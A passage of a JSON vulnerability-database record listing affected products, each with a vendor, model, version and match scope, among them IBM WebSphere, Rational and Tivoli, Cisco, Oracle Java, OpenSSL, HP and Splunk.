          {
            "_id": null,
            "model": "nexus series switches",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90000"
          },
          {
            "_id": null,
            "model": "idataplex dx360 m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "79120"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "buildforge ifix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.28"
          },
          {
            "_id": null,
            "model": "security access manager for mobile",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.5"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "websphere real time sr8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "telepresence mcu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "85100"
          },
          {
            "_id": null,
            "model": "norman shark industrial control system protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "jdk update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ip interoperability and collaboration system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.5"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.306"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.055"
          },
          {
            "_id": null,
            "model": "netezza platform software 7.2.0.4-p3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0g",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.5"
          },
          {
            "_id": null,
            "model": "hunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.1"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.42"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.025"
          },
          {
            "_id": null,
            "model": "endeca server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.6.1.0.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "prime security manager 04.8 qa08",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rational automation framework ifix5",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.3"
          },
          {
            "_id": null,
            "model": "ns oncommand core package",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "sametime community server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9"
          },
          {
            "_id": null,
            "model": "norman shark scada protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "cognos planning interim fix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1.1.4"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1.7"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.0-68"
          },
          {
            "_id": null,
            "model": "system m2 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x355041980"
          },
          {
            "_id": null,
            "model": "prime license manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.47"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "_id": null,
            "model": "cloud manager interim fix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.3"
          },
          {
            "_id": null,
            "model": "upward integration modules for vmware vsphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "aura communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.12"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.22"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "sterling control center ifix01",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.21"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.3"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.02"
          },
          {
            "_id": null,
            "model": "java sdk sr4-fp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37001.1"
          },
          {
            "_id": null,
            "model": "local collector appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2.8"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "api management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x310025820"
          },
          {
            "_id": null,
            "model": "websphere real time sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "tivoli storage flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.0"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "flex system fc3171 8gb san switch and san pass-thru",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.2.00"
          },
          {
            "_id": null,
            "model": "tivoli asset discovery for distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.1"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.039"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.43"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "_id": null,
            "model": "aura experience portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "notes fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.35"
          },
          {
            "_id": null,
            "model": "license metric tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.2"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.1"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1k",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.8.06"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.04"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser user interface ifix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5.0.208"
          },
          {
            "_id": null,
            "model": "jre update22",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.220"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50001.1"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.15"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12g",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "java sdk ga",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8"
          },
          {
            "_id": null,
            "model": "tivoli common reporting",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.1.2"
          },
          {
            "_id": null,
            "model": "cognos business intelligence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "ip office application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1i",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.12"
          },
          {
            "_id": null,
            "model": "rational requisitepro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "_id": null,
            "model": "sterling connect:express for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4.6"
          },
          {
            "_id": null,
            "model": "system management homepage c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.10.186"
          },
          {
            "_id": null,
            "model": "db2 workgroup server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "adaptive security appliance software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.4(7.26)"
          },
          {
            "_id": null,
            "model": "real-time compression appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.8.0.10"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.043"
          },
          {
            "_id": null,
            "model": "tivoli network performance manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.1"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "communications session border controller scz7.3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "domino fp if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.121"
          },
          {
            "_id": null,
            "model": "cognos business intelligence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.3"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1010.3.1.1779"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.1"
          },
          {
            "_id": null,
            "model": "virtual connect enterprise manager sdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.35"
          },
          {
            "_id": null,
            "model": "jre update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "cognos tm1 interim fix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1.1.2"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8y",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "tivoli storage manager for virtual environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.8"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.39"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.11"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.68"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.4"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.3.4"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ac2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v90000"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.1"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser ifix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4.11.03"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 23584 14",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update26",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.0.260"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.1.830"
          },
          {
            "_id": null,
            "model": "nextscale nx360 m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "54550"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.14"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.22"
          },
          {
            "_id": null,
            "model": "tivoli network performance manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "tandberg codian isdn gw",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "32200"
          },
          {
            "_id": null,
            "model": "link for mac os (build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.1.139)"
          },
          {
            "_id": null,
            "model": "websphere dashboard framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.1"
          },
          {
            "_id": null,
            "model": "tivoli common reporting",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.2"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 11",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.08"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "jabber video for telepresence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "proventia network enterprise scanner",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "norman shark network protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "rational developer for i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.036"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1.1"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10e",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.3"
          },
          {
            "_id": null,
            "model": "workcentre 3025ni",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "3.50.01.10"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.7"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0.0-95"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2.2"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0.6"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp05",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp01",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for unix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.0"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.51"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.5"
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.180"
          },
          {
            "_id": null,
            "model": "security privileged identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.1.1"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3690x571480"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.16"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.17"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "(x86)4.1"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1.5"
          },
          {
            "_id": null,
            "model": "norman shark network protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10p",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0.0 06",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.2"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.7"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.0.1"
          },
          {
            "_id": null,
            "model": "aura presence services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "rational automation framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.2"
          },
          {
            "_id": null,
            "model": "chassis management module 2peo12r",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "tivoli storage manager for virtual environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3.2.3"
          },
          {
            "_id": null,
            "model": "control center ifix01",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.0"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x375087220"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.3"
          },
          {
            "_id": null,
            "model": "java sdk 6r1 sr8-fp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "netezza platform software 7.1.0.4-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "cloud manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.1"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.6.1"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1f",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.3"
          },
          {
            "_id": null,
            "model": "bes12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.0.1"
          },
          {
            "_id": null,
            "model": "tivoli storage manager client management services",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1.200"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "32253.50.01.10"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.4.1"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.5"
          },
          {
            "_id": null,
            "model": "java sdk sr16",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "multi-enterprise integration gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "upward integration modules for microsoft system center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "rational requisitepro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2"
          },
          {
            "_id": null,
            "model": "bbm meetings for blackberry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "100"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "bcaaa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
